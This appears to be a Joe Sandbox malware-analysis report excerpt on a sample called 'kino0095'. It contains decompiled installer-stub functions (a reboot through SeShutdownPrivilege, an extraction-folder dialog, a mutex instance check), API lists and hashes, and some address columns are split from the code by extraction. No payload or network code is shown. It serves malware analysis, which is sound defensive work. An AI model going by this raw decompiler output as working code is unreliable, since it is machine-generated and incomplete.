• Opcode ID: 659d1aa42583b31f1520716c5f717e66031b0d66ec4e3c1a900689dd28924c27
• Instruction ID: 506609a329af40b885101141af8caa9dc78bc83ff989cdde194571b2f077488d
• Opcode Fuzzy Hash: 659d1aa42583b31f1520716c5f717e66031b0d66ec4e3c1a900689dd28924c27
• Instruction Fuzzy Hash: 0FD17D71A042455EFFBA9A3C8CC87FA7FF5AB16304F0481EAC6D6D7185D67689828F40
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 60%
E010B1F90(signed int __ecx, void* __edi, void* __esi) {
	signed int _v8;
	int _v12;
	struct _TOKEN_PRIVILEGES _v24;
	void* _v28;
	void* __ebx;
	signed int _t13;
	int _t21;
	void* _t25;
	int _t28;
	signed char _t30;
	void* _t38;
	void* _t40;
	void* _t41;
	signed int _t46;

	_t41 = __esi;
	_t38 = __edi;
	_t30 = __ecx;
	if((__ecx & 0x00000002) != 0) {
		L12:
		if((_t30 & 0x00000004) != 0) {
			L14:
			if( *0x10b9a40 != 0) {
                                                                                                                                                                                                                                    							_pop(_t30);
                                                                                                                                                                                                                                    							_t44 = _t46;
                                                                                                                                                                                                                                    							_t13 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    							_v8 = _t13 ^ _t46;
                                                                                                                                                                                                                                    							_push(_t38);
                                                                                                                                                                                                                                    							if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v28) != 0) {
                                                                                                                                                                                                                                    								LookupPrivilegeValueA(0, "SeShutdownPrivilege",  &(_v24.Privileges));
                                                                                                                                                                                                                                    								_v24.PrivilegeCount = 1;
                                                                                                                                                                                                                                    								_v12 = 2;
                                                                                                                                                                                                                                    								_t21 = AdjustTokenPrivileges(_v28, 0,  &_v24, 0, 0, 0);
                                                                                                                                                                                                                                    								CloseHandle(_v28);
                                                                                                                                                                                                                                    								_t41 = _t41;
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								if(_t21 != 0) {
                                                                                                                                                                                                                                    									if(ExitWindowsEx(2, ??) != 0) {
                                                                                                                                                                                                                                    										_t25 = 1;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t37 = 0x4f7;
                                                                                                                                                                                                                                    										goto L3;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									_t37 = 0x4f6;
                                                                                                                                                                                                                                    									goto L4;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t37 = 0x4f5;
                                                                                                                                                                                                                                    								L3:
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								L4:
                                                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                    								E010B44B9(0, _t37);
                                                                                                                                                                                                                                    								_t25 = 0;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_pop(_t40);
                                                                                                                                                                                                                                    							return E010B6CE0(_t25, _t30, _v8 ^ _t44, _t37, _t40, _t41);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t28 = ExitWindowsEx(2, 0);
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t37 = 0x522;
                                                                                                                                                                                                                                    						_t28 = E010B44B9(0, 0x522, 0x10b1140, 0, 0x40, 4);
                                                                                                                                                                                                                                    						if(_t28 != 6) {
                                                                                                                                                                                                                                    							goto L16;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					__eax = E010B1EA7(__ecx);
                                                                                                                                                                                                                                    					if(__eax != 2) {
                                                                                                                                                                                                                                    						L16:
                                                                                                                                                                                                                                    						return _t28;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						goto L12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
Instruction addresses reported for the listing above, in listing order:
0x010b1f90 0x010b1f90 0x010b1f93 0x010b1f98 0x010b1fa4 0x010b1fa7 0x010b1fc5 0x010b1fcd 0x010b1fdb 0x010b1ee5 0x010b1eea 0x010b1ef1 0x010b1ef4 0x010b1f0c 0x010b1f2e 0x010b1f3a 0x010b1f46 0x010b1f4d 0x010b1f58 0x010b1f60 0x010b1f61 0x010b1f62 0x010b1f75 0x010b1f80 0x010b1f77 0x010b1f77 0x00000000 0x010b1f77 0x010b1f64 0x010b1f64 0x00000000 0x010b1f64 0x010b1f0e 0x010b1f0e 0x010b1f13 0x010b1f13 0x010b1f14 0x010b1f14 0x010b1f16 0x010b1f17 0x010b1f1a 0x010b1f1f 0x010b1f1f 0x010b1f86 0x010b1f8f 0x010b1fcf 0x010b1fd3 0x00000000 0x010b1fd3 0x010b1fa9 0x010b1fb4 0x010b1fbb 0x010b1fc3 0x00000000 0x00000000 0x00000000 0x00000000 0x010b1fc3 0x010b1f9a 0x010b1f9a 0x010b1fa2 0x010b1fd9 0x010b1fda 0x00000000 0x00000000 0x00000000 0x010b1fa2

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?,?), ref: 010B1EFB
                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 010B1F02
                                                                                                                                                                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 010B1FD3
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CurrentExitOpenTokenWindows
                                                                                                                                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                                                                                                                                    • API String ID: 2795981589-3733053543
                                                                                                                                                                                                                                    • Opcode ID: 71b00507d17e549065567557d0764ccb40accadfa537c4ed9353de51c1b5ee58
                                                                                                                                                                                                                                    • Instruction ID: 41a1c18012f8f42f14170d7976bcd1d39797439c94fe1ac3c57e1ea55b7aa5c0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 71b00507d17e549065567557d0764ccb40accadfa537c4ed9353de51c1b5ee58
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121E571B40206BBDB705AA5ACD9FFF76FCEB85B50F100429FA82E6185D77A8401C761
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                    			E010B6CF0(struct _EXCEPTION_POINTERS* _a4) {
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				SetUnhandledExceptionFilter(0);
                                                                                                                                                                                                                                    				UnhandledExceptionFilter(_a4);
                                                                                                                                                                                                                                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010B6E26,010B1000), ref: 010B6CF7
                                                                                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(010B6E26,?,010B6E26,010B1000), ref: 010B6D00
                                                                                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,010B6E26,010B1000), ref: 010B6D0B
                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,010B6E26,010B1000), ref: 010B6D12
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 3231755760-0
                                                                                                                                                                                                                                    • Opcode ID: b848ec611dd8b94c04b18ae560ecac8726410280d7f7caaea153f05878511306
                                                                                                                                                                                                                                    • Instruction ID: efb039b1c930456ab4363c3ce1f53d358158e9830560f5dd5706ef76cd90f68e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b848ec611dd8b94c04b18ae560ecac8726410280d7f7caaea153f05878511306
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3D0C972200108FBDBA12BE1E84CA993F2CEB48292F444800F35983004CA3B48518B51
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 76%
                                                                                                                                                                                                                                    			E010B3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                    				void* _t10;
                                                                                                                                                                                                                                    				int _t20;
                                                                                                                                                                                                                                    				int _t21;
                                                                                                                                                                                                                                    				int _t23;
                                                                                                                                                                                                                                    				char _t24;
                                                                                                                                                                                                                                    				long _t25;
                                                                                                                                                                                                                                    				int _t27;
                                                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                                                    				void* _t32;
                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                    				int _t34;
                                                                                                                                                                                                                                    				int _t37;
                                                                                                                                                                                                                                    				int _t38;
                                                                                                                                                                                                                                    				int _t39;
                                                                                                                                                                                                                                    				void* _t42;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    				CHAR* _t49;
                                                                                                                                                                                                                                    				void* _t58;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				struct HWND__* _t64;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t64 = _a4;
                                                                                                                                                                                                                                    				_t6 = _a8 - 0x10;
                                                                                                                                                                                                                                    				if(_t6 == 0) {
                                                                                                                                                                                                                                    					_push(0);
                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                    					EndDialog(_t64, ??);
                                                                                                                                                                                                                                    					L39:
                                                                                                                                                                                                                                    					__eflags = 1;
                                                                                                                                                                                                                                    					return 1;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t42 = 1;
                                                                                                                                                                                                                                    				_t10 = _t6 - 0x100;
                                                                                                                                                                                                                                    				if(_t10 == 0) {
                                                                                                                                                                                                                                    					E010B43D0(_t64, GetDesktopWindow());
                                                                                                                                                                                                                                    					SetWindowTextA(_t64, "doza2");
                                                                                                                                                                                                                                    					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                                                                                                                                                                                                                                    					__eflags =  *0x10b9a40 - _t42; // 0x3
                                                                                                                                                                                                                                    					if(__eflags == 0) {
                                                                                                                                                                                                                                    						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					L36:
                                                                                                                                                                                                                                    					return _t42;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(_t10 == _t42) {
                                                                                                                                                                                                                                    					_t20 = _a12 - 1;
                                                                                                                                                                                                                                    					__eflags = _t20;
                                                                                                                                                                                                                                    					if(_t20 == 0) {
                                                                                                                                                                                                                                    						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10b91e4, 0x104);
						__eflags = _t21;
						if(_t21 == 0) {
							L32:
							_t58 = 0x4bf;
							_push(0);
							_push(0x10);
							_push(0);
							_push(0);
							L25:
							E010B44B9(_t64, _t58);
							goto L39;
						}
						_t49 = 0x10b91e4;
						do {
							_t23 =  *_t49;
							_t49 =  &(_t49[1]);
							__eflags = _t23;
						} while (_t23 != 0);
						__eflags = _t49 - 0x10b91e5 - 3;
						if(_t49 - 0x10b91e5 < 3) {
							goto L32;
						}
						_t24 =  *0x10b91e5; // 0x3a
						__eflags = _t24 - 0x3a;
						if(_t24 == 0x3a) {
							L21:
							_t25 = GetFileAttributesA(0x10b91e4);
							__eflags = _t25 - 0xffffffff;
							if(_t25 != 0xffffffff) {
								L26:
								E010B658A(0x10b91e4, 0x104, 0x10b1140);
								_t27 = E010B58C8(0x10b91e4);
								__eflags = _t27;
								if(_t27 != 0) {
									__eflags =  *0x10b91e4 - 0x5c;
									if( *0x10b91e4 != 0x5c) {
										L30:
										_t30 = E010B597D(0x10b91e4, 1, _t64, 1);
										__eflags = _t30;
										if(_t30 == 0) {
											L35:
											_t42 = 1;
											__eflags = 1;
											goto L36;
										}
										L31:
										_t42 = 1;
										EndDialog(_t64, 1);
										goto L36;
									}
									__eflags =  *0x10b91e5 - 0x5c;
									if( *0x10b91e5 == 0x5c) {
										goto L31;
									}
									goto L30;
								}
								_push(0);
								_push(0x10);
								_push(0);
								_push(0);
								_t58 = 0x4be;
								goto L25;
							}
							_t32 = E010B44B9(_t64, 0x54a, 0x10b91e4, 0, 0x20, 4);
							__eflags = _t32 - 6;
							if(_t32 != 6) {
								goto L35;
							}
							_t33 = CreateDirectoryA(0x10b91e4, 0);
							__eflags = _t33;
							if(_t33 != 0) {
								goto L26;
							}
							_push(0);
							_push(0x10);
							_push(0);
							_push(0x10b91e4);
							_t58 = 0x4cb;
							goto L25;
						}
						__eflags =  *0x10b91e4 - 0x5c;
						if( *0x10b91e4 != 0x5c) {
							goto L32;
						}
						__eflags = _t24 - 0x5c;
						if(_t24 != 0x5c) {
							goto L32;
						}
						goto L21;
					}
					_t34 = _t20 - 1;
					__eflags = _t34;
					if(_t34 == 0) {
						EndDialog(_t64, 0);
						 *0x10b9124 = 0x800704c7;
						goto L39;
					}
					__eflags = _t34 != 0x834;
					if(_t34 != 0x834) {
						goto L36;
					}
					_t37 = LoadStringA( *0x10b9a3c, 0x3e8, 0x10b8598, 0x200);
					__eflags = _t37;
					if(_t37 != 0) {
						_t38 = E010B4224(_t64, _t46, _t46);
						__eflags = _t38;
						if(_t38 == 0) {
							goto L36;
						}
						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10b87a0);
						__eflags = _t39;
						if(_t39 != 0) {
							goto L36;
						}
						_t63 = 0x4c0;
						L9:
						E010B44B9(_t64, _t63, 0, 0, 0x10, 0);
						_push(0);
						goto L38;
					}
					_t63 = 0x4b1;
					goto L9;
				}
				return 0;
			}
                                                                                                                                                                                                                                    0x010b3438
                                                                                                                                                                                                                                    0x010b3237
                                                                                                                                                                                                                                    0x010b3243
                                                                                                                                                                                                                                    0x010b3243
                                                                                                                                                                                                                                    0x010b3246
                                                                                                                                                                                                                                    0x010b32ee
                                                                                                                                                                                                                                    0x010b32f4
                                                                                                                                                                                                                                    0x010b32f6
                                                                                                                                                                                                                                    0x010b33d4
                                                                                                                                                                                                                                    0x010b33d6
                                                                                                                                                                                                                                    0x010b33db
                                                                                                                                                                                                                                    0x010b33dc
                                                                                                                                                                                                                                    0x010b33de
                                                                                                                                                                                                                                    0x010b33df
                                                                                                                                                                                                                                    0x010b3370
                                                                                                                                                                                                                                    0x010b3372
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3372
                                                                                                                                                                                                                                    0x010b32fc
                                                                                                                                                                                                                                    0x010b3301
                                                                                                                                                                                                                                    0x010b3301
                                                                                                                                                                                                                                    0x010b3303
                                                                                                                                                                                                                                    0x010b3304
                                                                                                                                                                                                                                    0x010b3304
                                                                                                                                                                                                                                    0x010b330a
                                                                                                                                                                                                                                    0x010b330d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3313
                                                                                                                                                                                                                                    0x010b3318
                                                                                                                                                                                                                                    0x010b331a
                                                                                                                                                                                                                                    0x010b3331
                                                                                                                                                                                                                                    0x010b3332
                                                                                                                                                                                                                                    0x010b333a
                                                                                                                                                                                                                                    0x010b333d
                                                                                                                                                                                                                                    0x010b337c
                                                                                                                                                                                                                                    0x010b3388
                                                                                                                                                                                                                                    0x010b338f
                                                                                                                                                                                                                                    0x010b3394
                                                                                                                                                                                                                                    0x010b3396
                                                                                                                                                                                                                                    0x010b33a4
                                                                                                                                                                                                                                    0x010b33ab
                                                                                                                                                                                                                                    0x010b33b6
                                                                                                                                                                                                                                    0x010b33be
                                                                                                                                                                                                                                    0x010b33c3
                                                                                                                                                                                                                                    0x010b33c5
                                                                                                                                                                                                                                    0x010b3435
                                                                                                                                                                                                                                    0x010b3437
                                                                                                                                                                                                                                    0x010b3437
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3437
                                                                                                                                                                                                                                    0x010b33c7
                                                                                                                                                                                                                                    0x010b33c9
                                                                                                                                                                                                                                    0x010b33cc
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b33cc
                                                                                                                                                                                                                                    0x010b33ad
                                                                                                                                                                                                                                    0x010b33b4
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b33b4
                                                                                                                                                                                                                                    0x010b3398
                                                                                                                                                                                                                                    0x010b3399
                                                                                                                                                                                                                                    0x010b339b
                                                                                                                                                                                                                                    0x010b339c
                                                                                                                                                                                                                                    0x010b339d
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b339d
                                                                                                                                                                                                                                    0x010b334c
                                                                                                                                                                                                                                    0x010b3351
                                                                                                                                                                                                                                    0x010b3354
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b335c
                                                                                                                                                                                                                                    0x010b3362
                                                                                                                                                                                                                                    0x010b3364
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3366
                                                                                                                                                                                                                                    0x010b3367
                                                                                                                                                                                                                                    0x010b3369
                                                                                                                                                                                                                                    0x010b336a
                                                                                                                                                                                                                                    0x010b336b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b336b
                                                                                                                                                                                                                                    0x010b331c
                                                                                                                                                                                                                                    0x010b3323
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3329
                                                                                                                                                                                                                                    0x010b332b
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b332b
                                                                                                                                                                                                                                    0x010b324c
                                                                                                                                                                                                                                    0x010b324c
                                                                                                                                                                                                                                    0x010b324f
                                                                                                                                                                                                                                    0x010b32c8
                                                                                                                                                                                                                                    0x010b32ce
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b32ce
                                                                                                                                                                                                                                    0x010b3251
                                                                                                                                                                                                                                    0x010b3256
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b3271
                                                                                                                                                                                                                                    0x010b3277
                                                                                                                                                                                                                                    0x010b3279
                                                                                                                                                                                                                                    0x010b3298
                                                                                                                                                                                                                                    0x010b329d
                                                                                                                                                                                                                                    0x010b329f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x010b32b0

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LoadStringA.USER32(000003E8,010B8598,00000200), ref: 010B3271
                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 010B33E2
                                                                                                                                                                                                                                    • SetWindowTextA.USER32(?,doza2), ref: 010B33F7
                                                                                                                                                                                                                                    • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010B3410
                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000836), ref: 010B3426
                                                                                                                                                                                                                                    • EnableWindow.USER32(00000000), ref: 010B342D
                                                                                                                                                                                                                                    • EndDialog.USER32(?,00000000), ref: 010B343F
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000001.00000002.437433001.00000000010B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 010B0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437414550.00000000010B0000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437491566.00000000010B8000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BA000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    • Associated: 00000001.00000002.437501771.00000000010BC000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_1_2_10b0000_kino0095.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                                                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\$doza2
                                                                                                                                                                                                                                    • API String ID: 2418873061-44923337
                                                                                                                                                                                                                                    • Opcode ID: 87b748583cf2e8783afa97150ee1b7301e64a892357f5e5cd0ab68ab84cb8591
                                                                                                                                                                                                                                    • Instruction ID: 4ee44f626569541bbf0676c83b2918006a578d36290530ac1de246bf04c65b82
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b748583cf2e8783afa97150ee1b7301e64a892357f5e5cd0ab68ab84cb8591
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6551F670381240B6EBB25A395CCCFFB2D98FB45B54F208428F6C5AA2C5CFAD94019364
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                                                                                                    			E010B2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                                                    				void* _t20;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                    				struct HRSRC__* _t31;
                                                                                                                                                                                                                                    				intOrPtr _t33;
                                                                                                                                                                                                                                    				void* _t43;
                                                                                                                                                                                                                                    				void* _t48;
                                                                                                                                                                                                                                    				signed int _t65;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                    				signed int _t67;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t13 =  *0x10b8004; // 0x72151d89
                                                                                                                                                                                                                                    				_v8 = _t13 ^ _t67;
                                                                                                                                                                                                                                    				_t65 = 0;
                                                                                                                                                                                                                                    				_t66 = __ecx;
                                                                                                                                                                                                                                    				_t48 = __edx;
                                                                                                                                                                                                                                    				 *0x10b9a3c = __ecx;
                                                                                                                                                                                                                                    				memset(0x10b9140, 0, 0x8fc);
                                                                                                                                                                                                                                    				memset(0x10b8a20, 0, 0x32c);
                                                                                                                                                                                                                                    				memset(0x10b88c0, 0, 0x104);
                                                                                                                                                                                                                                    				 *0x10b93ec = 1;
                                                                                                                                                                                                                                    				_t20 = E010B468F("TITLE", 0x10b9154, 0x7f);
                                                                                                                                                                                                                                    				if(_t20 == 0 || _t20 > 0x80) {
                                                                                                                                                                                                                                    					_t64 = 0x4b1;
                                                                                                                                                                                                                                    					goto L32;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t27 = CreateEventA(0, 1, 1, 0);
                                                                                                                                                                                                                                    					 *0x10b858c = _t27;
                                                                                                                                                                                                                                    					SetEvent(_t27);
                                                                                                                                                                                                                                    					_t64 = 0x10b9a34;
                                                                                                                                                                                                                                    					if(E010B468F("EXTRACTOPT", 0x10b9a34, 4) != 0) {
                                                                                                                                                                                                                                    						if(( *0x10b9a34 & 0x000000c0) == 0) {
                                                                                                                                                                                                                                    							L12:
                                                                                                                                                                                                                                    							 *0x10b9120 =  *0x10b9120 & _t65;
                                                                                                                                                                                                                                    							if(E010B5C9E(_t48, _t48, _t65, _t66) != 0) {
                                                                                                                                                                                                                                    								if( *0x10b8a3a == 0) {
                                                                                                                                                                                                                                    									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                                                                                                                                                                                                                                    									if(_t31 != 0) {
                                                                                                                                                                                                                                    										_t65 = LoadResource(_t66, _t31);
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if( *0x10b8184 != 0) {
                                                                                                                                                                                                                                    										__imp__#17();
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									if( *0x10b8a24 == 0) {
                                                                                                                                                                                                                                    										_t57 = _t65;
                                                                                                                                                                                                                                    										if(E010B36EE(_t65) == 0) {
                                                                                                                                                                                                                                    											goto L33;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t33 =  *0x10b9a40; // 0x3
                                                                                                                                                                                                                                    											_t48 = 1;
                                                                                                                                                                                                                                    											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                                                                                                                                                                                                                                    												if(( *0x10b9a34 & 0x00000100) == 0 || ( *0x10b8a38 & 0x00000001) != 0 || E010B18A3(_t64, _t66) != 0) {
                                                                                                                                                                                                                                    													goto L30;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													_t64 = 0x7d6;
                                                                                                                                                                                                                                    													if(E010B6517(_t57, 0x7d6, _t34, E010B19E0, 0x547, 0x83e) != 0x83d) {
                                                                                                                                                                                                                                    														goto L33;
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L30;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												L30:
                                                                                                                                                                                                                                    												_t23 = _t48;
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t23 = 1;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                    									E010B2390(0x10b8a3a);
                                                                                                                                                                                                                                    									goto L33;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t64 = 0x520;
					L32:
					E010B44B9(0, _t64, 0, 0, 0x10, 0);
					goto L33;
				}
			} else {
				_t64 =  &_v268;
				if(E010B468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
					goto L3;
				} else {
					_t43 = CreateMutexA(0, 1,  &_v268);
					 *0x10b8588 = _t43;
					if(_t43 == 0 || GetLastError() != 0xb7) {
						goto L12;
					} else {
						if(( *0x10b9a34 & 0x00000080) == 0) {
							_t64 = 0x524;
							if(E010B44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
								goto L12;
							} else {
								goto L11;
							}
						} else {
							_t64 = 0x54b;
							E010B44B9(0, 0x54b, "doza2", 0, 0x10, 0);
							L11:
							CloseHandle( *0x10b8588);
							 *0x10b9124 = 0x800700b7;
							goto L33;
						}
					}
				}
			}
		} else {
			L3:
			_t64 = 0x4b1;
			E010B44B9(0, 0x4b1, 0, 0, 0x10, 0);
			 *0x10b9124 = 0x80070714;
			L33:
			_t23 = 0;
		}
	}
	return E010B6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
}

Address column for the decompiled function above (spilled out of the side-by-side layout during extraction; one entry per decompiled line, in order):
0x010b2cb5 0x010b2cbc 0x010b2cc7 0x010b2cc9 0x010b2cd1 0x010b2cd3 0x010b2cd9 0x010b2ce9
0x010b2cf9 0x010b2d0e 0x010b2d15 0x010b2d1c 0x010b2ef3 0x00000000 0x010b2d2d 0x010b2d34
